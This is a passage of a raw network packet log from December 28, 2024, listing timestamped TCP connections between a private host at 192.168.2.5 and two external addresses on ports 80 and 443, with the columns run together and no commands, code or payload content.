                                                                                                                                                                    Dec 28, 2024 09:29:48.351402998 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.351407051 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.351819992 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.351880074 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.351927996 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.351948023 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.351986885 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.352077007 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.352330923 CET4976280192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:48.352435112 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.352458000 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.352543116 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.352547884 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.353063107 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.353072882 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.353208065 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.353214025 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.353224993 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.353681087 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.353707075 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.353807926 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.353812933 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.354271889 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.354285955 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.354350090 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.354355097 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.355182886 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.355252028 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.355259895 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.355272055 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.355331898 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.355806112 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.355811119 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.355844975 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.355894089 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.356395960 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.356416941 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.356511116 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.356515884 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.356586933 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.356590986 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.357136965 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.357141018 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.357198000 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.357202053 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.357594013 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.357619047 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.357728004 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.357732058 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.357780933 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.358246088 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.358258963 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.358376980 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.358381987 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.358896971 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.358901024 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.358937025 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.359009981 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.359015942 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.359455109 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.359461069 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.359497070 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472430944 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472450972 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472532034 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472572088 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472666979 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472671032 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472735882 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472740889 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472851992 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472856045 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472914934 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.472966909 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473057032 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473110914 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473153114 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473243952 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473373890 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473393917 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473494053 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473498106 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473619938 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473623991 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473664999 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473692894 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473814011 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473818064 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473871946 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473875999 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.473968983 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474044085 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474047899 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474060059 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474165916 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474176884 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474293947 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474301100 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474466085 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474469900 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474544048 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474549055 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474601984 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474633932 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474745989 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474750996 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:48.474766970 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:50.812779903 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:50.812851906 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:50.812932014 CET4976280192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:50.813198090 CET4976280192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:50.932696104 CET8049762194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:50.973381996 CET4977380192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:51.092962027 CET8049773194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:51.093092918 CET4977380192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:51.093384981 CET4977380192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:51.212752104 CET8049773194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:51.360985994 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:51.361064911 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:51.362418890 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:51.362418890 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:51.362493038 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.549942970 CET8049773194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.550082922 CET8049773194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.550141096 CET4977380192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:52.550299883 CET4977380192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:52.669729948 CET8049773194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.671482086 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.671566010 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:52.673687935 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:52.673695087 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.673940897 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.698225975 CET4977980192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:52.725289106 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:52.747071028 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:52.747109890 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:52.747205019 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.817814112 CET8049779194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.818053961 CET4977980192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:52.818582058 CET4977980192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:52.938019991 CET8049779194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:53.732347965 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:53.732445002 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:53.732513905 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:53.734601974 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:53.734625101 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:53.734638929 CET49774443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:53.734646082 CET44349774172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:53.742460966 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:53.742491007 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:53.742589951 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:53.742878914 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:53.742892981 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:54.462794065 CET8049779194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:54.462814093 CET8049779194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:54.462912083 CET4977980192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:54.463191032 CET4977980192.168.2.5194.87.58.92
                                                                                                                                                                    Dec 28, 2024 09:29:54.583334923 CET8049779194.87.58.92192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:54.952879906 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:54.952954054 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:54.954727888 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:54.954742908 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:54.954986095 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:54.956130028 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:54.956248999 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:54.956279039 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.726481915 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.726538897 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.726572037 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.726608038 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.726638079 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.726653099 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.726681948 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.726696968 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.729068041 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.729085922 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.743050098 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.743144035 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.743228912 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.743246078 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.745018005 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.751435995 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.803397894 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.845973015 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.897159100 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.918432951 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.922254086 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.922362089 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.922373056 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.922571898 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.923031092 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.923052073 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:55.923063993 CET49781443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:55.923069954 CET44349781172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:56.217170000 CET49787443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:56.217231035 CET44349787172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:56.217312098 CET49787443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:56.217891932 CET49787443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:56.217904091 CET44349787172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:57.475580931 CET44349787172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:57.475682974 CET49787443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:57.476988077 CET49787443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:57.476999044 CET44349787172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:57.477329016 CET44349787172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:57.482177973 CET49787443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:57.482338905 CET49787443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:57.482371092 CET44349787172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:58.431231976 CET44349787172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:58.431355953 CET44349787172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:58.431425095 CET49787443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:58.441864967 CET49787443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:58.441894054 CET44349787172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:58.810566902 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:58.810611963 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:58.810687065 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:58.810992956 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:29:58.811003923 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:00.114815950 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:00.115076065 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:00.116523981 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:00.116538048 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:00.116780043 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:00.118062019 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:00.118208885 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:00.118243933 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:00.118304968 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:00.163335085 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:00.949923992 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:00.950030088 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:00.950090885 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:00.950418949 CET49794443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:00.950433969 CET44349794172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:01.157720089 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:01.157764912 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:01.157830954 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:01.158147097 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:01.158162117 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:02.418222904 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:02.418306112 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:02.419656992 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:02.419678926 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:02.419929028 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:02.421199083 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:02.421555042 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:02.421592951 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:02.421837091 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:02.421852112 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:03.408044100 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:03.408149958 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:03.408215046 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:03.408934116 CET49800443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:03.408962011 CET44349800172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:03.878381014 CET49810443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:03.878448009 CET44349810172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:03.878526926 CET49810443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:03.878927946 CET49810443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:03.878942966 CET44349810172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:05.088660002 CET44349810172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:05.088798046 CET49810443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:05.090554953 CET49810443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:05.090576887 CET44349810172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:05.090838909 CET44349810172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:05.094592094 CET49810443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:05.094681978 CET49810443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:05.094692945 CET44349810172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:05.934570074 CET44349810172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:05.934669971 CET44349810172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:05.934834003 CET49810443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:05.935035944 CET49810443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:05.935055017 CET44349810172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:06.845284939 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:06.845335960 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:06.845417023 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:06.845737934 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:06.845752001 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.148794889 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.149158001 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.150480986 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.150495052 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.150787115 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.152376890 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.152980089 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.153012991 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.157138109 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.157186985 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.157320023 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.157351017 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.157479048 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.157505035 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.157668114 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.157696009 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.157879114 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.157907963 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.157917023 CET49818443192.168.2.5172.67.128.184
